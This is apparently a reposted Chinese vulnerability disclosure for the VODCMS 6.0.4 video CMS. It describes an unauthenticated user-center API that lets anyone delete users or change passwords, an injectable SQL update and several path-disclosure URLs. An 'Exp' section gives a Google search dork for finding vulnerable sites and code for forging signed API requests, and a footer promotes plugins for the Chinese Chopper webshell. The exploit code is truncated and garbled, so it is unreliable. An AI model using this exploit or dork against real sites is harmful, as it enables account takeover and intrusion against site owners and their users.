任意删用户,任意改用户密码bug,及其他暴路径bug
api/uc.php: $code = $_GET['code']; //code未过滤 if(empty($get)) { exit(API_RETURN_SUCCEED); } elseif($action == 'deleteuser') { !API_DELETEUSER && exit(API_RETURN_FORBIDDEN); //用户删除 API 接口 exit(API_RETURN_SUCCEED); } elseif($action == 'renameuser') { !API_RENAMEUSER && exit(API_RETURN_FORBIDDEN); //用户改名 API 接口 $db->query("UPDATE {$tablepre}members SET username='$usernamenew' WHERE uid='$uid'"); exit(API_RETURN_SUCCEED); } elseif($action == 'updatepw') { !API_UPDATEPW && exit(API_RETURN_FORBIDDEN); |
index.php?mod=feedback&action=report 暴路径
index.php?mod=content&action=comment 暴路径
index.php?mod=api&action=getfromvodcms 暴路径
Exp:
/* google inurl:index.php?mod=category */ $ckey_length = 4; $key = md5($key ? $key : UC_KEY); $cryptkey = $keya.md5($keya.$keyc); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $result = ''; $rndkey = array(); for($j = $i = 0; $i for($a = $j = $i = 0; $i } '); ?> |
文章来源于lcx.cc:【漏洞】秀影电影程序VODCMS 6.0.4 bugs
相关推荐: 中国菜刀的两个小插件(asp) 扫描常用端口+读取终端端口
By:nowake 中国菜刀的两个小插件(asp),扫描常用端口,读取终端端口(3389、Mstsc)。 扫描常用端口: ip="127.0.0.1" port="21,23,80,3306,1433,3389,43958" arrport=S…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论